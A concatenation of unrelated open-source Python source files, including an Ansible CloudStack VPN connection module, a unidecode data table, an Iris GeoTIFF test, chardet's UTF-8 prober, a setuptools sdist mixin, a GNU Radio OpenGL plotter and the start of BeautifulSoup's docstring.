xen0l/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/cloudstack/cs_vpn_connection.py
|
35
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: cs_vpn_connection
short_description: Manages site-to-site VPN connections on Apache CloudStack based clouds.
description:
- Create and remove VPN connections.
version_added: "2.5"
author: "René Moser (@resmo)"
options:
vpc:
description:
- Name of the VPC the VPN connection is related to.
required: true
vpn_customer_gateway:
description:
- Name of the VPN customer gateway.
required: true
passive:
description:
- State of the VPN connection.
- Only considered when C(state=present).
default: no
type: bool
force:
description:
- Activate the VPN gateway if not already activated on C(state=present).
- Also see M(cs_vpn_gateway).
default: no
type: bool
state:
description:
- State of the VPN connection.
default: present
choices: [ present, absent ]
domain:
description:
- Domain the VPN connection is related to.
account:
description:
- Account the VPN connection is related to.
project:
description:
- Name of the project the VPN connection is related to.
poll_async:
description:
- Poll async jobs until job has finished.
default: yes
type: bool
extends_documentation_fragment: cloudstack
'''
EXAMPLES = r'''
- name: Create a VPN connection with activated VPN gateway
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
- name: Create a VPN connection and force VPN gateway activation
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
force: yes
- name: Remove a vpn connection
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
state: absent
'''
RETURN = r'''
---
id:
description: UUID of the VPN connection.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
vpn_gateway_id:
description: UUID of the VPN gateway.
returned: success
type: string
sample: 04589590-ac63-93f5-4ffc-b698b8ac38b6
domain:
description: Domain the VPN connection is related to.
returned: success
type: string
sample: example domain
account:
description: Account the VPN connection is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the VPN connection is related to.
returned: success
type: string
sample: Production
created:
description: Date the connection was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
dpd:
description: Whether dead pear detection is enabled or not.
returned: success
type: bool
sample: true
esp_lifetime:
description: Lifetime in seconds of phase 2 VPN connection.
returned: success
type: int
sample: 86400
esp_policy:
description: IKE policy of the VPN connection.
returned: success
type: string
sample: aes256-sha1;modp1536
force_encap:
description: Whether encapsulation for NAT traversal is enforced or not.
returned: success
type: bool
sample: true
ike_lifetime:
description: Lifetime in seconds of phase 1 VPN connection.
returned: success
type: int
sample: 86400
ike_policy:
description: ESP policy of the VPN connection.
returned: success
type: string
sample: aes256-sha1;modp1536
cidrs:
description: List of CIDRs of the customer gateway.
returned: success
type: list
sample: [ 10.10.10.0/24 ]
passive:
description: Whether the connection is passive or not.
returned: success
type: bool
sample: false
public_ip:
description: IP address of the VPN gateway.
returned: success
type: string
sample: 10.100.212.10
gateway:
description: IP address of the VPN customer gateway.
returned: success
type: string
sample: 10.101.214.10
state:
description: State of the VPN connection.
returned: success
type: string
sample: Connected
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
cs_required_together
)
class AnsibleCloudStackVpnConnection(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackVpnConnection, self).__init__(module)
self.returns = {
'dpd': 'dpd',
'esplifetime': 'esp_lifetime',
'esppolicy': 'esp_policy',
'gateway': 'gateway',
'ikepolicy': 'ike_policy',
'ikelifetime': 'ike_lifetime',
'publicip': 'public_ip',
'passive': 'passive',
's2svpngatewayid': 'vpn_gateway_id',
}
self.vpn_customer_gateway = None
def get_vpn_customer_gateway(self, key=None, identifier=None, refresh=False):
if not refresh and self.vpn_customer_gateway:
return self._get_by_key(key, self.vpn_customer_gateway)
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'fetch_list': True,
}
vpn_customer_gateway = identifier or self.module.params.get('vpn_customer_gateway')
vcgws = self.query_api('listVpnCustomerGateways', **args)
if vcgws:
for vcgw in vcgws:
if vpn_customer_gateway.lower() in [vcgw['id'], vcgw['name'].lower()]:
self.vpn_customer_gateway = vcgw
return self._get_by_key(key, self.vpn_customer_gateway)
self.fail_json(msg="VPN customer gateway not found: %s" % vpn_customer_gateway)
def get_vpn_gateway(self, key=None):
args = {
'vpcid': self.get_vpc(key='id'),
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
}
vpn_gateways = self.query_api('listVpnGateways', **args)
if vpn_gateways:
return self._get_by_key(key, vpn_gateways['vpngateway'][0])
elif self.module.params.get('force'):
if self.module.check_mode:
return {}
res = self.query_api('createVpnGateway', **args)
vpn_gateway = self.poll_job(res, 'vpngateway')
return self._get_by_key(key, vpn_gateway)
self.fail_json(msg="VPN gateway not found and not forced to create one")
def get_vpn_connection(self):
args = {
'vpcid': self.get_vpc(key='id'),
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
}
vpn_conns = self.query_api('listVpnConnections', **args)
if vpn_conns:
for vpn_conn in vpn_conns['vpnconnection']:
if self.get_vpn_customer_gateway(key='id') == vpn_conn['s2scustomergatewayid']:
return vpn_conn
def present_vpn_connection(self):
vpn_conn = self.get_vpn_connection()
args = {
's2scustomergatewayid': self.get_vpn_customer_gateway(key='id'),
's2svpngatewayid': self.get_vpn_gateway(key='id'),
'passive': self.module.params.get('passive'),
}
if not vpn_conn:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('createVpnConnection', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
vpn_conn = self.poll_job(res, 'vpnconnection')
return vpn_conn
def absent_vpn_connection(self):
vpn_conn = self.get_vpn_connection()
if vpn_conn:
self.result['changed'] = True
args = {
'id': vpn_conn['id']
}
if not self.module.check_mode:
res = self.query_api('deleteVpnConnection', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
self.poll_job(res, 'vpnconnection')
return vpn_conn
def get_result(self, vpn_conn):
super(AnsibleCloudStackVpnConnection, self).get_result(vpn_conn)
if vpn_conn:
if 'cidrlist' in vpn_conn:
self.result['cidrs'] = vpn_conn['cidrlist'].split(',') or [vpn_conn['cidrlist']]
# Ensure we return a bool
self.result['force_encap'] = True if vpn_conn.get('forceencap') else False
args = {
'key': 'name',
'identifier': vpn_conn['s2scustomergatewayid'],
'refresh': True,
}
self.result['vpn_customer_gateway'] = self.get_vpn_customer_gateway(**args)
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
vpn_customer_gateway=dict(required=True),
vpc=dict(required=True),
domain=dict(),
account=dict(),
project=dict(),
zone=dict(),
passive=dict(type='bool', default=False),
force=dict(type='bool', default=False),
state=dict(choices=['present', 'absent'], default='present'),
poll_async=dict(type='bool', default=True),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
acs_vpn_conn = AnsibleCloudStackVpnConnection(module)
state = module.params.get('state')
if state == "absent":
vpn_conn = acs_vpn_conn.absent_vpn_connection()
else:
vpn_conn = acs_vpn_conn.present_vpn_connection()
result = acs_vpn_conn.get_result(vpn_conn)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
JuliBakagianni/CEF-ELRC
|
refs/heads/master
|
lib/python2.7/site-packages/unidecode/x01d.py
|
240
|
data = (
'', # 0x00
'', # 0x01
'', # 0x02
'', # 0x03
'', # 0x04
'', # 0x05
'', # 0x06
'', # 0x07
'', # 0x08
'', # 0x09
'', # 0x0a
'', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'', # 0x10
'', # 0x11
'', # 0x12
'', # 0x13
'', # 0x14
'', # 0x15
'', # 0x16
'', # 0x17
'', # 0x18
'', # 0x19
'', # 0x1a
'', # 0x1b
'', # 0x1c
'', # 0x1d
'', # 0x1e
'', # 0x1f
'', # 0x20
'', # 0x21
'', # 0x22
'', # 0x23
'', # 0x24
'', # 0x25
'', # 0x26
'', # 0x27
'', # 0x28
'', # 0x29
'', # 0x2a
'', # 0x2b
'', # 0x2c
'', # 0x2d
'', # 0x2e
'', # 0x2f
'', # 0x30
'', # 0x31
'', # 0x32
'', # 0x33
'', # 0x34
'', # 0x35
'', # 0x36
'', # 0x37
'', # 0x38
'', # 0x39
'', # 0x3a
'', # 0x3b
'', # 0x3c
'', # 0x3d
'', # 0x3e
'', # 0x3f
'', # 0x40
'', # 0x41
'', # 0x42
'', # 0x43
'', # 0x44
'', # 0x45
'', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'', # 0x4b
'', # 0x4c
'', # 0x4d
'', # 0x4e
'', # 0x4f
'', # 0x50
'', # 0x51
'', # 0x52
'', # 0x53
'', # 0x54
'', # 0x55
'', # 0x56
'', # 0x57
'', # 0x58
'', # 0x59
'', # 0x5a
'', # 0x5b
'', # 0x5c
'', # 0x5d
'', # 0x5e
'', # 0x5f
'', # 0x60
'', # 0x61
'', # 0x62
'', # 0x63
'', # 0x64
'', # 0x65
'', # 0x66
'', # 0x67
'', # 0x68
'', # 0x69
'', # 0x6a
'', # 0x6b
'b', # 0x6c
'd', # 0x6d
'f', # 0x6e
'm', # 0x6f
'n', # 0x70
'p', # 0x71
'r', # 0x72
'r', # 0x73
's', # 0x74
't', # 0x75
'z', # 0x76
'g', # 0x77
'', # 0x78
'', # 0x79
'', # 0x7a
'', # 0x7b
'', # 0x7c
'p', # 0x7d
'', # 0x7e
'', # 0x7f
'b', # 0x80
'd', # 0x81
'f', # 0x82
'g', # 0x83
'k', # 0x84
'l', # 0x85
'm', # 0x86
'n', # 0x87
'p', # 0x88
'r', # 0x89
's', # 0x8a
'', # 0x8b
'v', # 0x8c
'x', # 0x8d
'z', # 0x8e
'', # 0x8f
'', # 0x90
'', # 0x91
'', # 0x92
'', # 0x93
'', # 0x94
'', # 0x95
'', # 0x96
'', # 0x97
'', # 0x98
'', # 0x99
'', # 0x9a
'', # 0x9b
'', # 0x9c
'', # 0x9d
'', # 0x9e
'', # 0x9f
'', # 0xa0
'', # 0xa1
'', # 0xa2
'', # 0xa3
'', # 0xa4
'', # 0xa5
'', # 0xa6
'', # 0xa7
'', # 0xa8
'', # 0xa9
'', # 0xaa
'', # 0xab
'', # 0xac
'', # 0xad
'', # 0xae
'', # 0xaf
'', # 0xb0
'', # 0xb1
'', # 0xb2
'', # 0xb3
'', # 0xb4
'', # 0xb5
'', # 0xb6
'', # 0xb7
'', # 0xb8
'', # 0xb9
'', # 0xba
'', # 0xbb
'', # 0xbc
'', # 0xbd
'', # 0xbe
'', # 0xbf
'', # 0xc0
'', # 0xc1
'', # 0xc2
'', # 0xc3
'', # 0xc4
'', # 0xc5
'', # 0xc6
'', # 0xc7
'', # 0xc8
'', # 0xc9
'', # 0xca
'', # 0xcb
'', # 0xcc
'', # 0xcd
'', # 0xce
'', # 0xcf
'', # 0xd0
'', # 0xd1
'', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'', # 0xe4
'', # 0xe5
'', # 0xe6
'', # 0xe7
'', # 0xe8
'', # 0xe9
'', # 0xea
'', # 0xeb
'', # 0xec
'', # 0xed
'', # 0xee
'', # 0xef
'', # 0xf0
'', # 0xf1
'', # 0xf2
'', # 0xf3
'', # 0xf4
'', # 0xf5
'', # 0xf6
'', # 0xf7
'', # 0xf8
'', # 0xf9
'', # 0xfa
'', # 0xfb
'', # 0xfc
'', # 0xfd
'', # 0xfe
)
|
zak-k/iris
|
refs/heads/master
|
lib/iris/tests/experimental/test_raster.py
|
7
|
# (C) British Crown Copyright 2014 - 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
import iris.tests as tests
import iris
import numpy as np
import PIL.Image
@tests.skip_gdal
@tests.skip_data
class TestGeoTiffExport(tests.IrisTest):
def check_tiff_header(self, tiff_filename, expect_keys, expect_entries):
"""
Checks the given tiff file's metadata contains the expected keys,
and some matching values (not all).
"""
with open(tiff_filename, 'rb') as fh:
im = PIL.Image.open(fh)
file_keys = im.tag.keys()
missing_keys = sorted(set(expect_keys) - set(file_keys))
msg_nokeys = "Tiff header has missing keys : {}."
self.assertEqual(missing_keys, [],
msg_nokeys.format(missing_keys))
extra_keys = sorted(set(file_keys) - set(expect_keys))
msg_extrakeys = "Tiff header has extra unexpected keys : {}."
self.assertEqual(extra_keys, [],
msg_extrakeys.format(extra_keys))
msg_badval = "Tiff header entry {} has value {} != {}."
for key, value in expect_entries.items():
content = im.tag[key]
self.assertEqual(content, value,
msg_badval.format(key, content, value))
def check_tiff(self, cube, header_keys, header_items):
# Check that the cube saves correctly to TIFF :
# * the header contains expected keys and (some) values
# * the data array retrives correctly
import iris.experimental.raster
with self.temp_filename('.tif') as temp_filename:
iris.experimental.raster.export_geotiff(cube, temp_filename)
# Check the metadata is correct.
self.check_tiff_header(temp_filename, header_keys, header_items)
# Ensure that north is at the top then check the data is correct.
coord_y = cube.coord(axis='Y', dim_coords=True)
data = cube.data
if np.diff(coord_y.bounds[0]) > 0:
data = cube.data[::-1, :]
im = PIL.Image.open(temp_filename)
im_data = np.array(im)
# Currently we only support writing 32-bit tiff, when comparing
# the data ensure that it is also 32-bit
np.testing.assert_array_equal(im_data,
data.astype(np.float32))
def _check_tiff_export(self, masked, inverted=False):
tif_header = 'SMALL_total_column_co2.nc.tif_header.txt'
tif_header_keys = [256, 257, 258, 259, 262, 273,
277, 278, 279, 284, 339, 33550, 33922]
tif_header_entries = {
256: (160,),
257: (159,),
258: (32,),
259: (1,),
262: (1,),
# Skip this one: behaviour is not consistent across gdal versions.
# 273: (354, 8034, 15714, 23394, 31074, 38754, 46434,
# 54114, 61794, 69474, 77154, 84834, 92514, 100194),
277: (1,),
278: (12,),
279: (7680, 7680, 7680, 7680, 7680, 7680, 7680,
7680, 7680, 7680, 7680, 7680, 7680, 1920),
284: (1,),
339: (3,),
33550: (1.125, 1.125, 0.0),
33922: (0.0, 0.0, 0.0, -0.5625, 89.4375, 0.0)
}
fin = tests.get_data_path(('NetCDF', 'global', 'xyt',
'SMALL_total_column_co2.nc'))
cube = iris.load_cube(fin)[0]
# PIL doesn't support float64
cube.data = cube.data.astype('f4')
# Ensure longitude values are continuous and monotonically increasing,
# and discard the 'half cells' at the top and bottom of the UM output
# by extracting a subset.
east = iris.Constraint(longitude=lambda cell: cell < 180)
non_edge = iris.Constraint(latitude=lambda cell: -90 < cell < 90)
cube = cube.extract(east & non_edge)
cube.coord('longitude').guess_bounds()
cube.coord('latitude').guess_bounds()
if masked:
# Mask some of the data + expect a slightly different header...
cube.data = np.ma.masked_where(cube.data <= 380, cube.data)
# There is an additional key..
tif_header_keys += [42113]
# Don't add a check entry for this, as coding changed between gdal
# version 1 and 2, *and* between Python2 and Python3.
# tif_header_entries[42113] = (u'1e+20',)
if inverted:
# Check with the latitude coordinate (and the corresponding
# cube.data) inverted.
# The output should be exactly the same.
coord = cube.coord('latitude')
coord.points = coord.points[::-1]
coord.bounds = None
coord.guess_bounds()
cube.data = cube.data[::-1, :]
self.check_tiff(cube, tif_header_keys, tif_header_entries)
def test_unmasked(self):
self._check_tiff_export(masked=False)
def test_masked(self):
self._check_tiff_export(masked=True)
def test_inverted(self):
self._check_tiff_export(masked=False, inverted=True)
if __name__ == "__main__":
tests.main()
|
mozaik-association/mozaik
|
refs/heads/8.0
|
odoo_addons/mozaik_address/tests/__init__.py
|
2
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_address, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_address is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_address is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_address.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import test_address_address
from . import test_postal_coordinate
|
harshilasu/LinkurApp
|
refs/heads/master
|
y/google-cloud-sdk/.install/.backup/lib/requests/packages/chardet/utf8prober.py
|
2918
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
|
Kamik423/uni_plan
|
refs/heads/master
|
plan/plan/lib64/python3.4/site-packages/setuptools/command/py36compat.py
|
286
|
import os
from glob import glob
from distutils.util import convert_path
from distutils.command import sdist
from setuptools.extern.six.moves import filter
class sdist_add_defaults:
"""
Mix-in providing forward-compatibility for functionality as found in
distutils on Python 3.7.
Do not edit the code in this class except to update functionality
as implemented in distutils. Instead, override in the subclass.
"""
def add_defaults(self):
"""Add all the default files to self.filelist:
- README or README.txt
- setup.py
- test/test*.py
- all pure Python modules mentioned in setup script
- all files pointed by package_data (build_py)
- all files defined in data_files.
- all files defined as scripts.
- all C sources listed as part of extensions or C libraries
in the setup script (doesn't catch C headers!)
Warns if (README or README.txt) or setup.py are missing; everything
else is optional.
"""
self._add_defaults_standards()
self._add_defaults_optional()
self._add_defaults_python()
self._add_defaults_data_files()
self._add_defaults_ext()
self._add_defaults_c_libs()
self._add_defaults_scripts()
@staticmethod
def _cs_path_exists(fspath):
"""
Case-sensitive path existence check
>>> sdist_add_defaults._cs_path_exists(__file__)
True
>>> sdist_add_defaults._cs_path_exists(__file__.upper())
False
"""
if not os.path.exists(fspath):
return False
# make absolute so we always have a directory
abspath = os.path.abspath(fspath)
directory, filename = os.path.split(abspath)
return filename in os.listdir(directory)
def _add_defaults_standards(self):
standards = [self.READMES, self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = False
for fn in alts:
if self._cs_path_exists(fn):
got_it = True
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if self._cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
def _add_defaults_optional(self):
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = filter(os.path.isfile, glob(pattern))
self.filelist.extend(files)
def _add_defaults_python(self):
# build_py is used to get:
# - python modules
# - files defined in package_data
build_py = self.get_finalized_command('build_py')
# getting python files
if self.distribution.has_pure_modules():
self.filelist.extend(build_py.get_source_files())
# getting package_data files
# (computed in build_py.data_files by build_py.finalize_options)
for pkg, src_dir, build_dir, filenames in build_py.data_files:
for filename in filenames:
self.filelist.append(os.path.join(src_dir, filename))
def _add_defaults_data_files(self):
# getting distribution.data_files
if self.distribution.has_data_files():
for item in self.distribution.data_files:
if isinstance(item, str):
# plain file
item = convert_path(item)
if os.path.isfile(item):
self.filelist.append(item)
else:
# a (dirname, filenames) tuple
dirname, filenames = item
for f in filenames:
f = convert_path(f)
if os.path.isfile(f):
self.filelist.append(f)
def _add_defaults_ext(self):
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
def _add_defaults_c_libs(self):
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
def _add_defaults_scripts(self):
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
if hasattr(sdist.sdist, '_add_defaults_standards'):
# disable the functionality already available upstream
class sdist_add_defaults:
pass
|
zitouni/gnuradio-3.6.1
|
refs/heads/master
|
gr-wxgui/src/python/plotter/channel_plotter.py
|
14
|
#
# Copyright 2008, 2009, 2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import wx
from grid_plotter_base import grid_plotter_base
from OpenGL import GL
import common
import numpy
import gltext
import math
LEGEND_TEXT_FONT_SIZE = 8
LEGEND_BOX_PADDING = 3
MIN_PADDING = 35, 10, 0, 0 #top, right, bottom, left
#constants for the waveform storage
SAMPLES_KEY = 'samples'
COLOR_SPEC_KEY = 'color_spec'
MARKERY_KEY = 'marker'
TRIG_OFF_KEY = 'trig_off'
##################################################
# Channel Plotter for X Y Waveforms
##################################################
class channel_plotter(grid_plotter_base):
def __init__(self, parent):
"""
Create a new channel plotter.
"""
#init
grid_plotter_base.__init__(self, parent, MIN_PADDING)
self.set_use_persistence(False)
#setup legend cache
self._legend_cache = self.new_gl_cache(self._draw_legend, 50)
self.enable_legend(False)
#setup waveform cache
self._waveform_cache = self.new_gl_cache(self._draw_waveforms, 50)
self._channels = dict()
#init channel plotter
self.register_init(self._init_channel_plotter)
self.callback = None
def _init_channel_plotter(self):
"""
Run gl initialization tasks.
"""
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
def enable_legend(self, enable=None):
"""
Enable/disable the legend.
@param enable true to enable
@return the enable state when None
"""
if enable is None: return self._enable_legend
self.lock()
self._enable_legend = enable
self._legend_cache.changed(True)
self.unlock()
def _draw_waveforms(self):
"""
Draw the waveforms for each channel.
Scale the waveform data to the grid using gl matrix operations.
"""
#use scissor to prevent drawing outside grid
GL.glEnable(GL.GL_SCISSOR_TEST)
GL.glScissor(
self.padding_left+1,
self.padding_bottom+1,
self.width-self.padding_left-self.padding_right-1,
self.height-self.padding_top-self.padding_bottom-1,
)
for channel in reversed(sorted(self._channels.keys())):
samples = self._channels[channel][SAMPLES_KEY]
num_samps = len(samples)
if not num_samps: continue
#use opengl to scale the waveform
GL.glPushMatrix()
GL.glTranslatef(self.padding_left, self.padding_top, 0)
GL.glScalef(
(self.width-self.padding_left-self.padding_right),
(self.height-self.padding_top-self.padding_bottom),
1,
)
GL.glTranslatef(0, 1, 0)
if isinstance(samples, tuple):
x_scale, x_trans = 1.0/(self.x_max-self.x_min), -self.x_min
points = zip(*samples)
else:
x_scale, x_trans = 1.0/(num_samps-1), -self._channels[channel][TRIG_OFF_KEY]
points = zip(numpy.arange(0, num_samps), samples)
GL.glScalef(x_scale, -1.0/(self.y_max-self.y_min), 1)
GL.glTranslatef(x_trans, -self.y_min, 0)
#draw the points/lines
GL.glColor3f(*self._channels[channel][COLOR_SPEC_KEY])
marker = self._channels[channel][MARKERY_KEY]
if marker is None:
GL.glVertexPointerf(points)
GL.glDrawArrays(GL.GL_LINE_STRIP, 0, len(points))
elif isinstance(marker, (int, float)) and marker > 0:
GL.glPointSize(marker)
GL.glVertexPointerf(points)
GL.glDrawArrays(GL.GL_POINTS, 0, len(points))
GL.glPopMatrix()
GL.glDisable(GL.GL_SCISSOR_TEST)
def _populate_point_label(self, x_val, y_val):
"""
Get the text the will populate the point label.
Give X and Y values for the current point.
Give values for the channel at the X coordinate.
@param x_val the current x value
@param y_val the current y value
@return a string with newlines
"""
#create text
label_str = '%s: %s\n%s: %s'%(
self.x_label, common.eng_format(x_val, self.x_units),
self.y_label, common.eng_format(y_val, self.y_units),
)
for channel in sorted(self._channels.keys()):
samples = self._channels[channel][SAMPLES_KEY]
num_samps = len(samples)
if not num_samps: continue
if isinstance(samples, tuple): continue
#linear interpolation
x_index = (num_samps-1)*(x_val-self.x_min)/(self.x_max-self.x_min)
x_index_low = int(math.floor(x_index))
x_index_high = int(math.ceil(x_index))
scale = x_index - x_index_low + self._channels[channel][TRIG_OFF_KEY]
y_value = (samples[x_index_high] - samples[x_index_low])*scale + samples[x_index_low]
label_str += '\n%s: %s'%(channel, common.eng_format(y_value, self.y_units))
return label_str
def _call_callback (self, x_val, y_val):
if self.callback != None:
self.callback(x_val, y_val)
def set_callback (self, callback):
self.callback = callback
def _draw_legend(self):
"""
Draw the legend in the upper right corner.
For each channel, draw a rectangle out of the channel color,
and overlay the channel text on top of the rectangle.
"""
if not self.enable_legend(): return
x_off = self.width - self.padding_right - LEGEND_BOX_PADDING
for i, channel in enumerate(reversed(sorted(self._channels.keys()))):
samples = self._channels[channel][SAMPLES_KEY]
if not len(samples): continue
color_spec = self._channels[channel][COLOR_SPEC_KEY]
txt = gltext.Text(channel, font_size=LEGEND_TEXT_FONT_SIZE)
w, h = txt.get_size()
#draw rect + text
GL.glColor3f(*color_spec)
self._draw_rect(
x_off - w - LEGEND_BOX_PADDING,
self.padding_top/2 - h/2 - LEGEND_BOX_PADDING,
w+2*LEGEND_BOX_PADDING,
h+2*LEGEND_BOX_PADDING,
)
txt.draw_text(wx.Point(x_off - w, self.padding_top/2 - h/2))
x_off -= w + 4*LEGEND_BOX_PADDING
def clear_waveform(self, channel):
"""
Remove a waveform from the list of waveforms.
@param channel the channel key
"""
self.lock()
if channel in self._channels.keys():
self._channels.pop(channel)
self._legend_cache.changed(True)
self._waveform_cache.changed(True)
self.unlock()
def set_waveform(self, channel, samples=[], color_spec=(0, 0, 0), marker=None, trig_off=0):
"""
Set the waveform for a given channel.
@param channel the channel key
@param samples the waveform samples
@param color_spec the 3-tuple for line color
@param marker None for line
@param trig_off fraction of sample for trigger offset
"""
self.lock()
if channel not in self._channels.keys(): self._legend_cache.changed(True)
self._channels[channel] = {
SAMPLES_KEY: samples,
COLOR_SPEC_KEY: color_spec,
MARKERY_KEY: marker,
TRIG_OFF_KEY: trig_off,
}
self._waveform_cache.changed(True)
self.unlock()
if __name__ == '__main__':
app = wx.PySimpleApp()
frame = wx.Frame(None, -1, 'Demo', wx.DefaultPosition)
vbox = wx.BoxSizer(wx.VERTICAL)
plotter = channel_plotter(frame)
plotter.set_x_grid(-1, 1, .2)
plotter.set_y_grid(-1, 1, .4)
vbox.Add(plotter, 1, wx.EXPAND)
plotter = channel_plotter(frame)
plotter.set_x_grid(-1, 1, .2)
plotter.set_y_grid(-1, 1, .4)
vbox.Add(plotter, 1, wx.EXPAND)
frame.SetSizerAndFit(vbox)
frame.SetSize(wx.Size(800, 600))
frame.Show()
app.MainLoop()
|
krintoxi/NoobSec-Toolkit
|
refs/heads/master
|
NoobSecToolkit /tools/inject/thirdparty/beautifulsoup/beautifulsoup.py
|
25
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it.
